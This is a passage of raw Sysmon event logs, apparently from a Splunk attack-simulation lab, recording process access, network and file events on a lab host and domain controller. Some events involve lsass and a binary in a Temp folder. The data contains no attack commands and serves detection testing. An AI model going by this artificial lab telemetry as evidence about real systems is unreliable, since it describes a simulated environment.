Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219213Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:49.363{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219212Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:49.363{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219211Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:49.363{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219210Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:49.363{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219209Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:49.363{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219208Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:49.363{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-14D1-6216-BF04-000000003902}1172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000219207Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:49.363{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-14D1-6216-BF04-000000003902}1172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000219206Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:49.364{4F8D34B0-14D1-6216-BF04-000000003902}1172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000219205Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:49.081{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C2BC8A985ADF8D24FADFD3A8B28DEE2,SHA256=FDA71B15168FCA961DAED0C96F1F7EA294FE070B326A8A4047B1772A4CEBCC2B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000294994Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:49.331{C8EA50B7-F2AD-6215-C000-000000003802}48565880C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294993Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:49.331{C8EA50B7-F2AD-6215-C000-000000003802}4856348C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294992Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:49.331{C8EA50B7-F2AD-6215-C000-000000003802}48565880C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294991Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:49.331{C8EA50B7-F2AD-6215-C000-000000003802}4856348C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294990Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:49.331{C8EA50B7-F2AD-6215-C000-000000003802}48565880C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294989Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:49.331{C8EA50B7-F2AD-6215-C000-000000003802}4856348C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294988Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:49.316{C8EA50B7-F2AD-6215-C000-000000003802}48565880C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294987Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:49.316{C8EA50B7-F2AD-6215-BB00-000000003802}44884564C:\Windows\system32\taskhostw.exe{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000294986Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localDownloads2022-02-23 11:04:49.316{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exeC:\Users\Administrator\Downloads\Logfile.PML2022-02-23 11:04:49.316 354300x8000000000000000219204Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:46.670{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51506-false10.0.1.12-8000- 23542300x8000000000000000295015Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:50.654{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=1EAE7E32C3E7C556398F00A3B0C326E6,SHA256=A89E9E4EC4AE77689E6598CBD929E10AFF302D89B2EE290B8B2D53B66830F5E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295014Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:50.652{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=93D77FF795BA11C1B18DDB5413A26CB4,SHA256=A329A4D0431447960FAF388C7C3C3C501533AE8C6718CC06CA1F7B697435A24A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295013Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:50.487{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7AC80359662C86FABD33FB17084F87B5,SHA256=6E72EC1C4C73E85F3314F36D3F58A92B5A4C7195D1F3458C566799B6D289D7A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219235Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:50.503{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43DFAA20998FBABAF98572FB6CB69CB9,SHA256=4DDAC23E315B26C22F84EF3D9B8A02DBB19AC72B90C59AE05FF44A8A603CEF83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219234Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:50.503{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=58E8BE86F78146578BD8C3BB844B885B,SHA256=6A0DDB50D9579F25EA2BA269551473629EF5BF2E4E75580A172319FB17468C51,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000219233Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:50.208{4F8D34B0-14D1-6216-C004-000000003902}35001240C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295012Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:49.980{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-14D1-6216-AC06-000000003802}7060C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295011Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:49.980{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-14D1-6216-AC06-000000003802}7060C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000295017Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:51.637{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7A38EE95C3B111667AEFBCFFCFD295E,SHA256=921E917E42486180F153F294720D63FCBE91DAA54D0411C87A076A1369D93CEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219250Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:51.238{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3575307E777BD07CFAA3A421CEBBB452,SHA256=EE59AF7D666B78373E1D04D7373525DFAFA25A5304417AD4AFC42605B60FBC8E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295016Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:49.473{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local55495- 10341000x8000000000000000219249Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:51.206{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-14D3-6216-C104-000000003902}2740C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219248Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:51.206{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219247Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 